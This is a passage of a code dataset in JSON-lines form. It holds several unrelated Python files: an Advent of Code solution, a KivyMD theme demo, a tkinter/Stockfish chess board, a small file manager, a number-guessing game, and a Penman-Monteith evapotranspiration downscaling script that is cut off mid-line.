yoffset\n return([sensor[0]-xrange,sensor[0]+xrange])\n\ninput = open(\"input.txt\")\n\nsensors = []\n\nfor line in input:\n line = line.strip()\n line = line[10:]\n line = line.split(\":\")\n line[0] = line[0].split(', ')\n sensor = [int(line[0][0][2:]),int(line[0][1][2:])]\n line[1] = line[1][22:]\n line[1] = line[1].split(', ')\n beacon = [int(line[1][0][2:]),int(line[1][1][2:])]\n sensors.append({\"sensor\":sensor,\"beacon\":beacon})\n\nslice = 2000000\n\nsliceCoverage = []\n\nfor sensorSet in sensors:\n sensorSlice = countSlice(sensorSet, slice)\n addSensorSlice = True\n if (not sensorSlice == None):\n for coverage in sliceCoverage:\n if (coverage[0] <= sensorSlice[0] <= coverage[1]) or (coverage[0] <= sensorSlice[1] <= coverage[1]):\n expandedCoverage = [sorted([coverage[0],sensorSlice[0]])[0],sorted([coverage[1],sensorSlice[1]])[1]]\n sliceCoverage.append(expandedCoverage)\n sliceCoverage.remove(coverage)\n addSensorSlice = False\n if (addSensorSlice):\n sliceCoverage.append(sensorSlice)\n\nlastLen = 0\nwhile (not lastLen == len(sliceCoverage)):\n lastLen = len(sliceCoverage)\n for coverage in sliceCoverage:\n for othercoverage in sliceCoverage:\n if (not othercoverage == coverage):\n if (othercoverage[0] <= coverage[0] <= othercoverage[1]) or (othercoverage[0] <= coverage[1] <= othercoverage[1]):\n expandedCoverage = [sorted([othercoverage[0],coverage[0]])[0],sorted([othercoverage[1],coverage[1]])[1]]\n sliceCoverage.append(expandedCoverage)\n sliceCoverage.remove(othercoverage)\n sliceCoverage.remove(coverage)\n break\n\ncoveredBeacons = 0\nbeaconX = []\n\nfor sensorSet in sensors:\n beacon = sensorSet[\"beacon\"]\n if (beacon[1] == slice):\n if (not beacon[1] in beaconX):\n beaconX.append(beacon[1])\nfor x in beaconX: \n for coverage in sliceCoverage:\n if (coverage[0] <= x <= coverage[1]):\n coveredBeacons += 1\n\ntotalCoverage = 0\n\nfor coverage in sliceCoverage:\n totalCoverage += coverage[1] - coverage[0] + 1\n\ncoverage = totalCoverage - coveredBeacons\n\nprint(coverage)","repo_name":"ts061282/AdventofCode2022","sub_path":"day15p1.py","file_name":"day15p1.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4678698929","text":"from kivy.lang import Builder\r\nfrom kivymd.app import MDApp\r\n\r\nfrom kivy.uix.screenmanager import ScreenManager, Screen, NoTransition\r\nfrom kivymd.uix.dialog import MDDialog\r\nfrom kivymd.uix.button import MDFlatButton, MDRectangleFlatButton\r\n\r\nfrom kivymd.uix.button import MDIconButton\r\nfrom kivy.core.window import Window\r\n#from kivymd.uix.filemanager import MDFileManager\r\n\r\n# ‘Red’, ‘Pink’, ‘Purple’, ‘DeepPurple’,\r\n# ‘Indigo’, ‘Blue’, ‘LightBlue’, ‘Cyan’,\r\n# ‘Teal’, ‘Green’, ‘LightGreen’, ‘Lime’,\r\n# ‘Yellow’, ‘Amber’, ‘Orange’, ‘DeepOrange’,\r\n# ‘Brown’, ‘Gray’, ‘BlueGray’.\r\n\r\ntema = 'Dark'\r\n\r\nclass MainApp(MDApp):\r\n\r\n def light(self):\r\n global tema\r\n tema = 'Light'\r\n self.theme_cls.theme_style = tema\r\n\r\n def dark(self):\r\n global tema\r\n tema = 'Dark'\r\n self.theme_cls.theme_style = tema\r\n\r\n def build(self):\r\n print(self)\r\n self.theme_cls.theme_style = tema\r\n self.theme_cls.primary_palette = \"Blue\"\r\n self.theme_cls.accent_palette = \"Red\"\r\n #return Builder.load_file('kvs/color_theme.kv')\r\n return Builder.load_string('''\r\nScreen:\r\n\r\n MDRectangleFlatButton:\r\n text: \"Light Button\"\r\n pos_hint: {\"center_x\": 0.5, \"center_y\": 0.7}\r\n md_bg_color: app.theme_cls.primary_light\r\n on_press: app.light()\r\n\r\n\r\n MDRaisedButton:\r\n text: \"Primary Button\"\r\n pos_hint: {\"center_x\": 0.5, \"center_y\": 0.5}\r\n\r\n\r\n MDRaisedButton:\r\n text: \"Dark Button\"\r\n pos_hint: {\"center_x\": 0.5, \"center_y\": 0.3}\r\n md_bg_color: app.theme_cls.primary_dark\r\n on_press: app.dark()\r\n\r\n ''')\r\n\r\nMainApp().run()","repo_name":"RaulBezerra/Kivy","sub_path":"43 - Using Color themes for KivyMD.py","file_name":"43 - Using Color themes for KivyMD.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37922864698","text":"import math\nfrom stockfish import Stockfish\nimport string\nfrom PIL import ImageTk, Image\nimport tkinter as tk\nfrom typing import List\n\nfrom logic.board.pieces import *\nfrom logic.enums.Color import Color\nfrom ui.consts.ColorConsts import ColorConsts\nimport ui.consts.filepaths as ui_filepaths\n\nclass BoardCanvas(tk.Canvas):\n def __init__(self, window: tk.Tk, master: tk.Widget, color: Color) -> None:\n super().__init__(\n master,\n background = ColorConsts.MEDIUM_GREY\n )\n self.window = window\n self.color = Color(color)\n self.dimension = 500\n self.config(height = self.dimension, width = self.dimension)\n self.piece_image_dimension = int(self.dimension / 6)\n self.images = []\n self.add_background()\n self.pack()\n \n def add_background(self) -> None:\n image = Image.open(ui_filepaths.CHESSBOARD_IMAGE)\n image = image.resize((self.dimension, self.dimension), Image.ANTIALIAS)\n self.background_image = ImageTk.PhotoImage(image)\n self.create_image(0, 0, anchor = tk.NW, image = self.background_image)\n\n def add_pieces(self, pieces: List[Piece]) -> None:\n self.piece_elements = []\n for piece in pieces:\n if piece.captured:\n continue\n virtual_x, virtual_y = piece.square.centre\n real_x, real_y = virtual_x * self.dimension / 8, virtual_y * self.dimension / 8\n if self.color == Color.BLACK:\n real_x, real_y = self.dimension - real_x, self.dimension - real_y\n real_y += self.dimension / 75 # This accounts for the fact that for some reason pieces in images are not centered\n image = Image.open(piece.image_filepath())\n image = image.resize((self.piece_image_dimension, self.piece_image_dimension))\n image = ImageTk.PhotoImage(image)\n self.images.append(image)\n piece_element = self.create_image(real_x, real_y, anchor = tk.CENTER, image = image)\n self.addtag_withtag(f'type_{piece.__class__.__name__}', piece_element)\n self.addtag_withtag(f'square_{str(piece.square)}', piece_element)\n self.piece_elements.append(piece_element)\n for piece_element in self.piece_elements:\n self.tag_bind(piece_element, '', self.piece_mousedown_handler)\n self.tag_bind(piece_element, '', self.piece_mouseup_handler)\n \n def piece_mousedown_handler(self, event) -> None:\n self.moving_element = self.find_closest(event.x, event.y)\n self.bind('', lambda e: self.moveto(self.moving_element, e.x - (self.piece_image_dimension / 2), e.y - (self.piece_image_dimension / 2)))\n \n def piece_mouseup_handler(self, event) -> None:\n self.unbind('')\n real_x, real_y = event.x, event.y\n if self.color == Color.BLACK:\n real_x, real_y = self.dimension - real_x, self.dimension - real_y\n virtual_x, virtual_y = real_x / self.dimension * 8, real_y / self.dimension * 8\n from_square = next(filter(lambda tag: tag.startswith('square_'), self.gettags(self.moving_element))).split('_')[1]\n to_square = self.get_square_from_virtual_coords(virtual_x, virtual_y)\n move = f'{from_square}{to_square}'\n move_valid = self.master.board.stockfish.is_move_correct(move)\n to_square = to_square if move_valid else from_square\n self.move_piece(from_square, to_square)\n \n def get_square_from_virtual_coords(self, virtual_x: int, virtual_y: int) -> None:\n file_name = string.ascii_lowercase[math.floor(virtual_x)]\n rank_name = list(reversed(range(1, 9)))[math.floor(virtual_y)]\n return f'{file_name}{rank_name}'\n \n def move_piece(self, from_square: str, to_square: str, castle_castling: bool = False) -> None:\n pass\n move = f'{from_square}{to_square}'\n\n # Handle basic movement\n virtual_x = string.ascii_lowercase.index(to_square[0]) + 0.5\n virtual_y = list(reversed(range(1, 9)))[int(to_square[1]) - 1] - 0.5\n real_x, real_y = virtual_x * self.dimension / 8, virtual_y * self.dimension / 8\n if self.color == Color.BLACK:\n real_x, real_y = self.dimension - real_x, self.dimension - real_y\n real_x, real_y = real_x - (self.piece_image_dimension / 2), real_y - (self.piece_image_dimension / 2)\n real_y += self.dimension / 75\n self.moveto(self.moving_element, real_x, real_y)\n\n # Handle capture\n move_capture = self.master.board.stockfish.will_move_be_a_capture(move) # Anything but Stockfish.Capture.NO_CAPTURE\n if move_capture == Stockfish.Capture.DIRECT_CAPTURE:\n captured_piece_element = self.find_withtag(f'square_{to_square}')\n self.delete(captured_piece_element)\n elif move_capture == Stockfish.Capture.EN_PASSANT:\n captured_piece_square_rank = 4 if int(to_square[1]) == 3 else 6\n captured_piece_square = f'{to_square[0]}{captured_piece_square_rank}'\n captured_piece_element = self.find_withtag(f'square_{captured_piece_square}')\n self.delete(captured_piece_element)\n \n # Update moving element canvas object metadata\n old_tags = self.gettags(self.moving_element)\n new_tags = tuple((f'square_{to_square}' if tag.startswith('square_') else tag) for tag in old_tags)\n self.itemconfig(self.moving_element, tags = new_tags)\n \n if not castle_castling:\n castling_move = 'type_King' in self.gettags(self.moving_element) and abs(ord(from_square[0]) - ord(to_square[0])) > 1\n if castling_move:\n # Handle castling rook\n rook_from_file = 'a' if to_square[0] == 'b' else 'h'\n rook_rank = to_square[1]\n rook_from_square = f'{rook_from_file}{rook_rank}'\n rook_to_file = 'c' if to_square[0] == 'b' else 'f'\n rook_to_square = f'{rook_to_file}{rook_rank}'\n self.moving_element = self.find_withtag(f'square_{rook_from_square}')\n self.move_piece(rook_from_square, rook_to_square, castle_castling = True)\n\n # Update backend\n self.master.move_piece(move)","repo_name":"wjrm500/Pawnfork","sub_path":"ui/abstract/BoardCanvas.py","file_name":"BoardCanvas.py","file_ext":"py","file_size_in_byte":6287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71223602969","text":"import os\n\nclass GestorFichero:\n\n def crear_archivo(self,path):\n nombre_fichero = input('Introduce el nombre del archivo: ')\n fichero = open(f'{path}/{nombre_fichero}', 'a+')\n return fichero\n def escribir_archivo(fichero):\n cantidad_palabras = int(input('Introduce la cantidad de palabras: '))\n for i in range(0, cantidad_palabras):\n palabra = input('Introduce una palabra: ')\n fichero.write(f'{palabra}\\n')\n\n def leer_linea(fichero):\n fichero.seek(0)\n lineas = fichero.readlines()\n \n for i in lineas:\n i = i.replace('\\n', '')\n print(i)\n input('Enter para mostrar mas lineas')\n \n def borrar_archivo(fichero):\n fichero.truncate(0)\n \n path = os.path.abspath(os.path.dirname(__file__))\n","repo_name":"OmegaMLM/Algoritmos_Datos","sub_path":"Ejercicios/U7/ejercicio7_7/gestor.py","file_name":"gestor.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70191401370","text":"# guesser.py\r\n\r\n\r\ndef guesser(a, rangeMax, rangeMin, guess, hint):\r\n\twhile guess != a:\r\n\t\tprint(rangeMax)\r\n\t\tprint(rangeMin)\r\n\t\tprint(\"Is the number \", (guess) )\r\n\r\n\t\thint = input(\"greater, less, or equal: \")\r\n\r\n\t\tif hint == \"greater\":\r\n\t\t\trangeMin = guess \r\n\t\t\tguess = (rangeMax + rangeMin) // 2\r\n\r\n\t\telif hint == \"less\":\r\n\t\t\trangeMax = guess \r\n\t\t\tguess = (rangeMax + rangeMin) // 2\r\n\r\n\t\telse:\r\n\t\t\tprint(\"There seems to be a problem :(\")\r\n\r\n\tprint(\"Get Rekt, I know what it is:\", guess)\r\n\r\ndef main():\r\n\trangeMax = int(input(\"Enter a max range: \"))\r\n\trangeMin = int(input(\"Enter a min range: \"))\r\n\ta = int(input(\"Enter a number for me to guess: \"))\r\n\tguess = (rangeMax + rangeMin) // 2\r\n\thint = \"\"\r\n\t\r\n\tguesser(a, rangeMax, rangeMin, guess, hint)\r\n\r\n\treplay = input(\"Do you want to play again?\")\r\n\r\n\tif replay == \"yes\":\r\n\t\tmain()\r\n\r\n\telif replay == \"no\":\r\n\t\tprint(\"bye\")\r\n\r\n\telse:\r\n\t\tprint(\"There seems to be a problem with the response\")\r\n\r\nmain()\r\n\r\ninput(\"press enter to continue\")\r\n\r\n\r\n","repo_name":"johnnysaldana/python_practice_exercises","sub_path":"guesser.py","file_name":"guesser.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"31860347223","text":"import getopt, sys, os\n# import pcraster as pcr\nimport datetime\nimport numpy as np\nimport numexpr as ne\nfrom e2o_utils import *\nimport gc\nimport time\n\n# from memory_profiler import profile\n\nnthreads = 4\nne.set_num_threads(nthreads)\n\n\ndef save_as_mapsstack_per_day(lat, lon, data, ncnt, date, directory, prefix=\"GADGET\", oformat=\"Gtiff\", FillVal=1E31,\n gzip=True):\n import platform\n\n if not os.path.exists(directory):\n os.mkdir(directory)\n mapname = getmapname(ncnt, prefix, date)\n # print \"saving map: \" + os.path.join(directory,mapname)\n # writeMap(os.path.join(directory,mapname),oformat,lon,lat[::-1],flipud(data[:,:]),-999.0)\n writeMap(os.path.join(directory, mapname), oformat, lon, lat, data[:, :], FillVal)\n if gzip:\n if 'Linux' in platform.system():\n os.system('gzip ' + os.path.join(directory, mapname))\n\n# @profile\ndef PenmanMonteith(currentdate, relevantDataFields, rtoa, es_mean, ea_mean, mismask, elev):\n \"\"\"\n\n :param lat:\n :param currentdate:\n :param relevantDataFields:\n :param Tmax:\n :param Tmin:\n :return:\n\n relevantDataFields : ['MaxTemperature','MinTemperature','NearSurfaceSpecificHumidity',\\\n 'SurfaceIncidentShortwaveRadiation','SurfaceWindSpeed','Pressure','CorrectedSpecificHumidity']\n \"\"\"\n\n Tmax = relevantDataFields[0]\n Tmin = relevantDataFields[1] + 273.15\n # Q = relevantDataFields[2]\n Rsin = relevantDataFields[3]\n Wsp = relevantDataFields[4]\n Pres = relevantDataFields[5]\n # Q = relevantDataFields[6]\n\n Tmean = (relevantDataFields[0] + (relevantDataFields[1]+273.16)) / 2\n Tmean[mismask] = 0.0001\n\n \"\"\"\n Computes Penman-Monteith reference evaporation\n Inputs:\n Rsin: netCDF obj or NumPy array -- 3D array (time, lat, lon) incoming shortwave radiation [W m-2]\n Rlin: netCDF obj or NumPy array -- 3D array (time, lat, lon) incoming longwave radiation [W m-2]\n Tmean: netCDF obj or NumPy array -- 3D array (time, lat, lon) daily mean temp [K]\n Tmax: netCDF obj or NumPy array -- 3D array (time, lat, lon) daily max. temp [K]\n Tmin: netCDF obj or NumPy array -- 3D array (time, lat, lon) daily min. temp [K]\n Wsp: netCDF obj or NumPy array -- 3D array (time, lat, lon) wind speed [m s-2]\n Q: netCDF obj or NumPy array -- 3D array (time, lat, lon) specific humididy [kg kg-1]\n Pres: netCDF obj or NumPy array -- 3D array (time, lat, lon) Surface air pressure [Pa]\n Pet: netCDF obj or NumPy array -- 3D array (time, lat, lon) for target data\n Outputs:\n trg_var: netCDF obj or NumPy array -- 3D array (time, lat, lon) for target data, updated with computed values\n \"\"\"\n cp = 1013 # specific heat of air 1013 [J kg-1 K-1]\n TimeStepSecs = 86400 # timestep in seconds\n karman = 0.41 # von Karman constant [-]\n vegh = 0.50 # vegetation height [m]\n alpha = 0.23 # albedo, 0.23 [-]\n rs = 45 # surface resistance, 70 [s m-1]\n R = 287.058 # Universal gas constant [J kg-1 K-1]\n convmm = 1000 * TimeStepSecs # conversion from meters to millimeters\n sigma = 4.903e-9 # stephan boltzmann [W m-2 K-4 day]\n eps = 0.622 # ratio of water vapour/dry air molecular weights [-]\n g = 9.81 # gravitational constant [m s-2]\n R_air = 8.3144621 # specific gas constant for dry air [J mol-1 K-1]\n Mo = 0.0289644 # molecular weight of gas [g / mol]\n lapse_rate = 0.0065 # lapse rate [K m-1]\n\n\n # clear sky solar radiation MJ d-1\n Rso = np.maximum(0.1, ne.evaluate(\"(0.75+(2*0.00005*elev)) * rtoa\")) # add elevation correction term elev with 5*10-5\n Rlnet_Watt = - sigma * (((Tmin ** 4 + Tmax ** 4) / 2) * (0.34 - 0.14 * np.sqrt(np.maximum(0, (ea_mean / 1000)))) \\\n * (1.35 * np.minimum(1, ((Rsin * 0.0864) / Rso)) - 0.35)) # ea_mean in Pa / 1000 to get kPa\n Rlnet_Watt /= 0.0864 # MJ d-1 to Watts\n\n Rnet = np.maximum(0, ((1 - alpha) * Rsin + Rlnet_Watt))\n\n #vapour pressure deficit\n vpd = np.maximum(es_mean - ea_mean, 0.)\n\n #Virtual temperature\n Tkv = Tmean * (1-0.378*(ea_mean/Pres))**-1\n # density of air [kg m-3]\n rho = Pres/(Tkv*R)\n\n # Latent heat [J kg-1]\n Lheat = (2.501-(0.002361*(Tmean-273.15)))*1e6\n\n # slope of vapour pressure [Pa C-1]\n deltop = 4098. *(610.8*np.exp((17.27*(Tmean-273.15))/((Tmean-273.15)+237.3)))\n delbase = ((Tmean-273.15)+237.3)**2\n delta = deltop/delbase\n # print('delta ', delta)\n\n # psychrometric constant\n gamma = cp*Pres/(eps*Lheat)\n # print('gamma ', gamma)\n\n # aerodynamic resistance\n z = 10 # height of wind speed variable (10 meters above surface)\n Wsp_2 = Wsp * 4.87 / (np.log(67.8 * z - 5.42)) # Measured over 0.13 m full grass = [m s-1]\n # ra = 208./Wsp_2 # 0.13 m short crop height = [s m-1]\n\n # Wsp_2 = Wsp*3.44/(np.log(16.3*z-5.42)) # Measured over 0.50 m tall crop height = [m s-1]\n ra = 110./Wsp_2 # 0.50 m tall crop height = [s m-1]\n\n\n PETmm = np.maximum(ne.evaluate(\"(delta * Rnet) + (rho * cp * (vpd / ra))\"), 1)\n PETmm /= np.maximum(ne.evaluate(\"(delta + gamma*(1 + rs/ra))\"), 1)\n PETmm *= (TimeStepSecs/Lheat)\n\n # PETag = pcr.numpy2pcr(Scalar, PETmm, 0.0)\n # aguila(PETag)\n\n if PETmm.any() == float(\"inf\"):\n sys.exit(\"Value infinity found\")\n else:\n pass\n\n return PETmm, delta, gamma, rho\n\n\ndef downscale(ncnt, currentdate, filenames, variables, standard_names, serverroot, wrrsetroot, relevantVars,\n elevationCorrection, BB, highResLon, highResLat, resLowResDEM, highResDEM,\n lowResLon, lowResLat, lowResDEM, logger, radcordir, odir, oprefix, lonmax, lonmin, latmax, latmin,\n downscaling, resamplingtype, oformat, saveAllData, FillVal):\n nrcalls = 0\n start_steptime = time.time()\n\n # Get all daily datafields needed and aad to list\n relevantDataFields = []\n\n year = str(currentdate.year)\n\n pm_year = 'PM{}'.format(year)\n rad_year = 'rad{}'.format(year)\n\n odirPM = os.path.join(odir, pm_year)\n if not os.path.exists(odirPM):\n os.mkdir(odirPM)\n odirrad = os.path.join(odir, rad_year)\n if not os.path.exists(odirrad):\n os.mkdir(odirrad)\n\n # Get all data for this timestep\n mapname = os.path.join(odirPM, getmapname(ncnt, oprefix, currentdate))\n if os.path.exists(mapname) or os.path.exists(mapname + \".gz\") or os.path.exists(mapname + \".zip\"):\n logger.info(\"Skipping map: \" + mapname)\n else:\n for i in range(0, len(variables)):\n if variables[i] in relevantVars:\n filename = filenames[i]\n logger.info(\"Getting data field: \" + filename)\n standard_name = standard_names[i]\n logger.info(\"Get file list..\")\n tlist, timelist = get_times_daily(currentdate, currentdate, serverroot, wrrsetroot, filename, logger)\n logger.info(\"Get dates..\")\n\n ncstepobj = getstepdaily(tlist, BB, standard_name, logger)\n\n logger.info(\"Get data...: \" + str(timelist))\n mstack = ncstepobj.getdates(timelist)\n mean_as_map = mstack.mean(axis=0) #Time dimension is 3(2) instead of 1st in new data\n\n\n\n # if variables[i] == 'SurfaceIncidentShortwaveRadiation':\n # save_as_mapsstack_per_day(lats, lons, mean_as_map, int(ncnt), currentdate, odir,\n # prefix='RTOT_pre_sample',oformat=oformat, FillVal=FillVal)\n\n logger.info(\"Get data body...\")\n logger.info(\"Downscaling...\" + variables[i])\n # print('Data dimensions{}'.format(mean_as_map.shape))\n # print('Lon shape{}'.format(ncstepobj.lon.shape))\n # print('Lat shape{}'.format(ncstepobj.lat.shape))\n\n \n # save_as_mapsstack_per_day(ncstepobj.lat,ncstepobj.lon,mean_as_map,int(ncnt),'temp',prefixes[i],oformat='GTiff')\n # mean_as_map = resample(FNhighResDEM,prefixes[i],int(ncnt),logger)\n mean_as_map = resample_grid(mean_as_map, ncstepobj.lon, ncstepobj.lat, highResLon, highResLat,\n method=resamplingtype, FillVal=FillVal)\n mismask = mean_as_map == FillVal\n mean_as_map = (mean_as_map)\n\n # if nrcalls == 0:\n # save_as_mapsstack_per_day(lowResLat, lowResLon, mean_as_map, int(ncnt), currentdate, odir,\n # prefix='TMIN',\n # oformat=oformat, FillVal=FillVal)\n\n mean_as_map[mismask] = FillVal\n if variables[i] == 'MaxTemperature':\n mean_as_map, Tmax = correctTemp(mean_as_map, elevationCorrection, FillVal)\n if variables[i] == 'MinTemperature':\n mean_as_map, Tmin = correctTemp(mean_as_map, elevationCorrection, FillVal)\n if variables[i] == 'SurfaceIncidentShortwaveRadiation':\n mean_as_map, rtoa = correctRsin(mean_as_map, currentdate, radcordir, LATITUDE, logger, FillVal)\n mean_as_map.clip(-999, 500, out=mean_as_map)\n mean_as_map[mismask] = FillVal\n\n relevantDataFields.append(mean_as_map)\n\n # only needed once to get vector of latitudes, needed to calculate Ra called by correctRsin function and PM (not needed, left over from before)\n if nrcalls == 0:\n nrcalls = nrcalls + 1\n latitude = ncstepobj.lat[:]\n # assuming a resolution of 0.041665999999999315 degrees (4km lat)\n factor = 1 / 0.041665999999999315 # ~24 instead of 8 for NLDAS (1/8 degree)\n LATITUDE = np.ones(((factor * (latmax - latmin)), (factor * (lonmax - lonmin))))\n for i in range(0, int((factor * (lonmax - lonmin)))):\n LATITUDE[:, i] = LATITUDE[:, i] * latitude\n if downscaling == 'True' or resampling == \"True\":\n # save_as_mapsstack_per_day(ncstepobj.lat,ncstepobj.lon,LATITUDE,int(ncnt),'temp','lat',oformat=oformat)\n # LATITUDE = resample(FNhighResDEM,'lat',int(ncnt),logger)\n LATITUDE = zeros_like(highResDEM)\n for i in range(0, LATITUDE.shape[1]):\n LATITUDE[:, i] = highResLat\n\n # assign longitudes and lattitudes grids\n if downscaling == 'True' or resampling == \"True\":\n lons = highResLon\n lats = highResLat\n else:\n lons = ncstepobj.lon\n lats = ncstepobj.lat\n\n # Correct Pressure separately since no data in METDATA netCDF file\n mean_as_map = correctPres(relevantDataFields, highResDEM, resLowResDEM, FillVal=FillVal)\n # mismask = mean_as_map == FillVal\n # mean_as_map[mismask] = FillVal\n relevantDataFields.append(mean_as_map)\n\n # Correct RH by keeping constant at lapsed temperature and adjust pressure with elevation\n es_mean, ea_mean, rh_corr, rh_org = correctQ_RH(relevantDataFields, Tmax, Tmin, highResDEM, resLowResDEM, mismask,\n FillVal=FillVal)\n # mean_as_map[mismask] = FillVal\n # relevantDataFields.append(mean_as_map)\n ea_org = ea_mean\n # ea_org.clip(-999, 10000, out=ea_org)\n\n # Apply aridity correction\n logger.info(\"Applying aridity correction...\")\n ea_mean, Tdew_diff = arid_cor(relevantDataFields[1], ea_mean, logger)\n mean_as_map[mismask] = FillVal\n # ea_arid = ea_mean\n # ea_arid.clip(-999, 10000, out=ea_arid)\n\n PETmm, delta, gamma, rho = PenmanMonteith(currentdate, relevantDataFields, rtoa, es_mean, ea_mean, mismask, highResDEM)\n # FIll out unrealistic values\n PETmm[mismask] = FillVal\n PETmm[isinf(PETmm)] = FillVal\n PETmm.clip(-999, 50, out=PETmm)\n\n logger.info(\"Saving PM PET data for: \" + str(currentdate))\n\n save_as_mapsstack_per_day(lats, lons, PETmm, int(ncnt), currentdate, odirPM, prefix=oprefix, oformat=oformat,\n FillVal=FillVal)\n save_as_mapsstack_per_day(lats, lons, relevantDataFields[3], int(ncnt), currentdate, odirrad, prefix='RTOT',\n oformat=oformat, FillVal=FillVal)\n # save_as_mapsstack_per_day(lats,lons,Rnet,int(ncnt),currentdate,odir,prefix='RNET',oformat=oformat,FillVal=FillVal)\n # save_as_mapsstack_per_day(lats,lons,Rlnet_Watt,int(ncnt),currentdate,odir,prefix='RLIN',oformat=oformat,FillVal=FillVal)\n # save_as_mapsstack_per_day(lats,lons,Ra,int(ncnt),currentdate,odir,prefix='Ra',oformat=oformat,FillVal=FillVal)\n # save_as_mapsstack_per_day(lats,lons,Tdew_diff,int(ncnt),currentdate,odir,prefix='Tdewcor',oformat=oformat,FillVal=FillVal)\n # save_as_mapsstack_per_day(lats,lons,ea_org,int(ncnt),currentdate,odir,prefix='ea_org',oformat=oformat,FillVal=FillVal)\n # save_as_mapsstack_per_day(lats,lons,ea_arid,int(ncnt),currentdate,odir,prefix='ea_arid',oformat=oformat,FillVal=FillVal)\n\n if saveAllData:\n save_as_mapsstack_per_day(lats, lons, relevantDataFields[5], int(ncnt), currentdate, odir, prefix='PRESS',\n oformat=oformat, FillVal=FillVal)\n save_as_mapsstack_per_day(lats, lons, relevantDataFields[3], int(ncnt), currentdate, odir, prefix='RSIN',\n oformat=oformat, FillVal=FillVal)\n save_as_mapsstack_per_day(lats, lons, relevantDataFields[4], int(ncnt), currentdate, odir, prefix='WIN',\n oformat=oformat, FillVal=FillVal)\n save_as_mapsstack_per_day(lats, lons, relevantDataFields[2], int(ncnt), currentdate, odir, prefix='Q',\n oformat=oformat, FillVal=FillVal)\n save_as_mapsstack_per_day(lats, lons, relevantDataFields[1], int(ncnt), currentdate, odir, prefix='TMIN',\n oformat=oformat, FillVal=FillVal)\n save_as_mapsstack_per_day(lats, lons, relevantDataFields[0], int(ncnt), currentdate, odir, prefix='TMAX',\n oformat=oformat, FillVal=FillVal)\n save_as_mapsstack_per_day(lats, lons, delta, int(ncnt), currentdate, odir, prefix='delta', oformat=oformat,\n FillVal=FillVal)\n save_as_mapsstack_per_day(lats, lons, gamma, int(ncnt), currentdate, odir, prefix='gamma', oformat=oformat,\n FillVal=FillVal)\n save_as_mapsstack_per_day(lats, lons, rho, int(ncnt), currentdate, odir, prefix='Rho', oformat=oformat,\n FillVal=FillVal)\n # save_as_mapsstack_per_day(lats,lons,relevantDataFields[6],int(ncnt),currentdate,odir,prefix='Qcorr',oformat=oformat,FillVal=FillVal)\n save_as_mapsstack_per_day(lats,lons,rh_corr,int(ncnt),currentdate,odir,prefix='RHcorr',oformat=oformat,FillVal=FillVal)\n save_as_mapsstack_per_day(lats,lons,rh_org,int(ncnt),currentdate,odir,prefix='RHorg',oformat=oformat,FillVal=FillVal)\n # save_as_mapsstack_per_day(lats,lons,Ra,int(ncnt),currentdate,odir,prefix='Ra',oformat=oformat,FillVal=FillVal)\n # save_as_mapsstack_per_day(lats,lons,Tmax,int(ncnt),currentdate,odir,prefix='Tmaxraw',oformat=oformat,FillVal=FillVal)\n # save_as_mapsstack_per_day(lats,lons,Tmin,int(ncnt),currentdate,odir,prefix='Tminraw',oformat=oformat,FillVal=FillVal)\n\n # relevantDataFields : ['MaxTemperature','MinTemperature','NearSurfaceSpecificHumidity',\\\n # 'SurfaceIncidentShortwaveRadiation','SurfaceWindSpeed','Pressure','CorrectedQ']\n\n # Empty calculated arrays\n compsteptime = (time.time() - start_steptime)\n print(str(currentdate) + ' Computation time: ' + str(compsteptime) + ' seconds' )\n #a = open(\"gadgetevap_comptime.txt\", \"a\")\n #a.write(str(currentdate) + ' Computation time: ' + str(compsteptime) + ' seconds' + '\\n')\n #a.close()\n\n pass\n\n\ndef correctTemp(Temp, elevationCorrection, FillVal):\n \"\"\"\n Elevation based correction of temperature\n\n inputs:\n Temperature = daily min or max temperature (degrees Celcius)\n Elevation correction = difference between high resolution and low resolution (4 km) DEM [m]\n\n constants:\n lapse_rate = 0.0065 # [ K m-1 ]\n \"\"\"\n\n # apply elevation correction\n lapse_rate = 0.0065 # [ K m-1 ]\n\n Temp[Temp < 0.0] = FillVal\n Temp[Temp == 0.0] = FillVal\n Temp[isinf(Temp)] = FillVal\n\n Temp_cor = ne.evaluate(\"Temp - lapse_rate * elevationCorrection\")\n # Tempag = pcr.numpy2pcr(Scalar, Temp, 0.0)\n # aguila(Tempag)\n # Elag = pcr.numpy2pcr(Scalar, elevationCorrection, 0.0)\n # aguila(Elag)\n Temp_cor[Temp_cor < 0.0] = FillVal\n Temp_cor[Temp_cor == 0.0] = FillVal\n Temp_cor[isinf(Temp_cor)] = FillVal\n\n return Temp_cor, Temp\n\n\ndef correctRsin(Rsin, currentdate, radiationCorDir, lat, logger, FillVal):\n \"\"\"\n Calculates daily topographically corrected incoming radiation using clear-sky global, beam and diffuse solar maps outputted from r.sun\n\n :param Rsin:\n :param currentdate:\n :param radiationCorDir:\n :param logger:\n :return: corrected incoming radiation (Rsin) and extraterrestrial radiation (Ra) \n \"\"\"\n\n path = radiationCorDir\n day = currentdate\n flatdir = 'FlatRad_DEMRes'\n topoDEM = 'RadWm2'\n\n # Get daily Extraterrestrial radiation\n rtoa, sunset = Ra_daily(currentdate, lat)\n\n rtoa /= 0.0864 # Convert from MJ day-1 to W m-2 day\n\n # Calculate clearness index (kt) using Ra, adjust with optical path if Kt >= 0.65\n kt = np.maximum(np.minimum(ne.evaluate(\"Rsin/rtoa\"), 1), 0.0001)\n\n # Use Ruiz-Ariaz, 2010b elevation function instead of Opcorr? Or saved Opcorr from hourly algorithm?\n #np.select([kt >= 0.65, kt < 0.65], [Rsin * Opcorr, Rsin])\n\n # Partition radiation into beam and diffuse components for flat surface following Ruiz-Ariaz, 2010b\n # (for hourly not daily solar radiation)\n # kd = np.maximum(0.952 - (1.041 * np.exp(-1 * np.exp(2.300 - 4.702 * kt))), 0.0001)\n\n # Partition daily global radiation into beam and diffuse components for flat surface following Erbs et al., 1982\n #Use different coefficients between Summer, Spring, Fall vs Winter based on sunset hour angle (radians)\n\n # print('sunset angle radians', sunset)\n kd = 